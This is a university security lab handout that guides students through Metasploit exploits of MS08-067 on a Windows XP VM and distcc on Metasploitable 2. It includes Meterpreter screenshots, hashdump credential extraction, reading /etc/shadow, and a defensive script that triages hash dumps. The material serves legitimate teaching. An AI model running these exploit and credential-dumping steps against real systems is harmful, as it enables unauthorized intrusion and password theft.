CIT 480: Securing Computer Systems

Lab #13: Metasploit

Name: ______

1: Introduction

In this lab, we will exploit vulnerabilities using the Metasploit exploitation framework on our Kali VM. We will use the Metasploitable 2 and Windows XP VMs as targets of our exploits. This lab will refer to their IP addresses as TARGET_IP. Read each section carefully to be sure that you are using the correct VMs. Start all VMs at the beginning of the lab.

We will run Metasploit on the Kali VM and use the msfconsole interface to metasploit. Start the Postgresql database and Metasploit services, then start msfconsole.

# /opt/metasploit/ctlscript.sh start

# msfpro

If you encounter an error about commands being unavailable, then you are either not running the above commands as root or you are attempting to run the command on the wrong VM. Remember that the Metasploitable VM is a target VM that is exploitable by Metasploit, not a VM that runs Metasploit to target other VMs.

If you reboot the Kali VM, you will need to restart Metasploit before being able to use msfpro.

It can take a few minutes for msfpro to start the first time as it does database setup. Once it starts, you will receive the msf > prompt. To make Metasploit work faster, we need to build a cache of all of its exploits and modules as follows. While the cache is rebuilt in the background, examine the Metasploit help to learn more about the capabilities of the framework.

msf > db_rebuild_cache

msf > help

There are many web pages and videos documenting how to use msfconsole that can be found with a quick web search.

References

  1. Metasploit Unleashed,
  2. Metasploit Pro Console User's Guide,
  3. Metasploit Megaprimer,
  4. Metasploit: The Penetration Tester's Guide, No Starch Press, 2011.
  5. Microsoft Security Bulletin MS08-067,

2: Windows Exploitation with Metasploit (10%)

In this section, we will exploit our Windows VM. This means that TARGET_IP in this section refers to the IP address of the Windows VM.

We will use msfconsole to exploit the vulnerability patched by Microsoft Security Bulletin MS08-067. This vulnerability allows an unpatched system to be compromised over the network and was used by the Conficker worm. While the vulnerability was patched in 2008, as the number 08 in the vulnerability identifier notes, it can still be found unpatched on a few systems like our Windows XP VM.

The search command in msfconsole will find exploits that match a set of keywords. The best type of keyword to use are vulnerability identifiers, so we will search for ms08-067.

msf > search ms08-067

There is only one match. We select that exploit by path with the use command.

msf > use exploit/windows/smb/ms08_067_netapi

The use command changes our prompt as shown below and offers a new set of commands. You need to identify which software version is running on the target with the show targets command. Targets are different versions of the software or different platforms on which the software may be running.

msf exploit(ms08_067_netapi) > show targets

As you can see, there are dozens of different versions of Windows, mainly differing in their language configuration. These types of targets are common for memory corruption exploits on Windows platforms, since the memory locations that need to be overwritten by the exploit are slightly different for each configuration. Our target is probably number 4 or 5 on the list. However, this exploit has an auto target option that will attempt to detect the correct target for us. It defaults to this target, so we do not have to change the setting.

The show options command will list all possible options for the exploit, including current settings, whether the option must be specified or not, and what the option means. Even though we have set no options, many options have default settings, so we only need to set the options that have no current setting, such as RHOST, the IP address of the machine that is the target of the exploit.

msf exploit(ms08_067_netapi) > show options

msf exploit(ms08_067_netapi) > set RHOST TARGET_IP

The last item that we usually want to specify is the payload, which is the action we want the exploit to perform on the target. Payloads include a wide variety of network shell connections, reverse shell connections, and remote desktops. Available payloads for this exploit can be shown with the show payloads command.

msf exploit(ms08_067_netapi) > show payloads

This exploit defaults to a special payload, the Meterpreter. Meterpreter is short for meta-interpreter, a special payload that is part of the Metasploit framework. In addition to the basic shell functions like listing directories and viewing files, Meterpreter provides the ability to take screenshots, access hardware devices like microphones and webcams, expand the scope of exploitation by elevating privileges or dumping password hashes, and much more.

Let's run our exploit, so we can find what we can do with Meterpreter.

msf exploit(ms08_067_netapi) > exploit

Once the exploit succeeds, you will receive a Meterpreter prompt. Type “help” to see a list of commands, then experiment with a few of them to answer the questions below.

meterpreter > help

2.1: Which directory are you in?

meterpreter > pwd

2.2: What OS is the target machine running according to the prodspec.ini file?

meterpreter > cat c:\prodspec.ini

2.3: Take a screenshot of the remote system, then view it on your local system with the eog command in another terminal. Write the filename of the screenshot image in the box below.

meterpreter > screenshot

$ eog FILENAME

2.4: Windows caches the password hashes of users who login to the local system. Meterpreter can retrieve these hashes for you to crack with a tool like John the Ripper. Write the hashes in the box below.

meterpreter > hashdump
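The hashdump lines are in pwdump format (user:RID:LM hash:NT hash:::), and the first thing a defender does with them is read what they say about the host. As an added example, not part of the lab, this Python script parses constructed hashdump-style output and flags accounts whose LM hash is actually stored (the host still keeps the weak LM format) or whose NT hash is the hash of the empty password; the non-constant hash values in the sample are placeholders, not real hashes.

```python
"""Triage of Meterpreter hashdump output (added example, not part of the lab).

hashdump prints one pwdump-style line per local account:
    user:RID:LM_hash:NT_hash:::
The two hex constants below are the well-known hashes of the empty string;
seeing them tells a defender something about the host's configuration.
"""
import re

# LM hash of "" - also shown when LM storage is disabled or the password is over 14 chars
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of "" - the account has a blank password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_hashdump(text):
    """Return a list of (user, rid, lm, nt) tuples; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            rows.append((user, int(rid), lm.lower(), nt.lower()))
    return rows


def assess(rows):
    """Map each account name to the list of findings a defender would act on."""
    findings = {}
    for user, rid, lm, nt in rows:
        issues = []
        if lm != EMPTY_LM:
            # A real LM value means the host still stores the weak LM hash format
            issues.append("lm_hash_stored")
        if nt == EMPTY_NT:
            issues.append("blank_password")
        findings[user] = issues
    return findings


# Constructed sample in hashdump format; the HelpAssistant values are placeholder hex.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
not a hashdump line and therefore ignored
"""

if __name__ == "__main__":
    for user, issues in assess(parse_hashdump(SAMPLE)).items():
        print(f"{user}: {', '.join(issues) or 'ok'}")
```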

When you're done exploring, shutdown the Windows VM and exit Meterpreter.

meterpreter > shutdown

meterpreter > quit

Use the console's back command to exit from the ms08-067 exploit.

msf exploit(ms08_067_netapi) > back

msf >

3: Linux Exploitation with Metasploit (10%)

We will use msfconsole to exploit the vulnerability in distcc that was missed by Nessus. Distcc is a distributed C compilation tool used to compile large software projects quickly by using multiple machines. In this case, we search for exploits by the name of the service rather than the vulnerability identifier, as we know the service name but not the identifier.

msf > search distcc

There is only one exploit for distcc. We select that exploit by path with the use command.

msf > use exploit/unix/misc/distcc_exec

The use command changes our prompt as shown below and offers a new set of commands. You can select a target with the show targets command. Targets are different versions of the software or different platforms on which the software may be running. For the distcc exploit, there is only one target, so we do not need to specify a target. However, we do have to specify an option. The show options command will list all possible options. The option we have to specify is RHOST, the IP address of the machine that we are exploiting.

msf exploit(distcc_exec) > show options

msf exploit(distcc_exec) > set RHOST TARGET_IP

Finally, we're ready to run our exploit, which we do with the command exploit.

msf exploit(distcc_exec) > exploit

This command will generate a fair amount of output describing the progress of the exploit. If it succeeds, you will see a final line of output that states something like “Command shell session opened.” If the exploit fails, verify that the firewall on the target server permits connection to the distcc port (3632) and retry the exploit.

With the default payload for this exploit, you immediately have access to a command shell. You can type commands in and see their results even though there is no command prompt. This interface is typical of bind shells. While bind shells are not as featureful as Meterpreter, they are sometimes the only available payload for an exploit.

3.1: What user are you logged in as? Do you have administrative credentials?

id

3.2: What directory are you in?

pwd

3.3: What version of the Linux kernel is the system running? What Linux distribution is on the system?

uname -a

cat /etc/lsb-release

3.4: Who is logged onto the system?

w

3.5: Is your session listed in the set of users logged in above?

3.6: What information about user accounts can you obtain? Can you crack passwords with this information?

cat /etc/passwd

cat /etc/shadow

Exit your bind shell connection with ctrl-c, then type back to return to the msf prompt.

4: Trying an Exploit on Your Own (80%)

Identify a vulnerable service that is exploitable but that we have not yet exploited on either of the two target VMs, search for an exploit in Metasploit, then execute the exploit against the target machine to get a shell connection. To identify a vulnerable service, you can research the OS versions (or network service versions as identified by nmap -sV) on the CVE details web site, or you can find a service identified by a Nessus scan of the target.

In the box below, list the full set of Metasploit commands you used to do the exploit, along with their output. Do not include the output of search or show commands, like show options or show payloads.

5: Submitting the Lab

Bring a printed copy with your name on it to class on the class period after which this lab was assigned. Online students turn in via Blackboard.